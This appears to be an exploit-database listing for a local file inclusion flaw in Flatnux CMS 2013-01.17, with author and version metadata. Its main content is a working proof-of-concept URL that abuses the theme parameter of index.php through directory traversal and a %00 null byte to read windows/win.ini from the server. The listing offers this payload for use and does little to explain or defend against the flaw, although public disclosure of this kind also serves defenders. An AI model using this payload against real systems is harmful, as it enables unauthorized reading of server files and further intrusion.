[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Flatnux CMS 2013-01.17 (index.php, theme param) - Local File Inclusion
# Published : 2013-03-22
# Author :
# Previous Title : vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection
# Next Title : PsychoStats 3.2.2b (awards.php, id param) - Blind SQL Injection


##########################################
[~] Exploit Title: Flatnux CMS Local File Inclusion
[~] Date: 21-03-2013
[~] Author: DaOne aka Mocking Bird
[~] Vendor Homepage: http://flatnux.altervista.org/
[~] Software Link: http://flatnux.altervista.org/download.html?f=Flatnux-Next/flatnux-2013-01.17.zip
[~] Category: webapps/php
[~] Version: 2013-01.17
[~] Tested on: Apache/2.2.8(Win32) PHP/5.2.6
##########################################

# Exploit
index.php?theme={localfile}{nullbyte}
http://localhost/flatnux/index.php?theme=../../../../../../../../../../windows/win.ini%00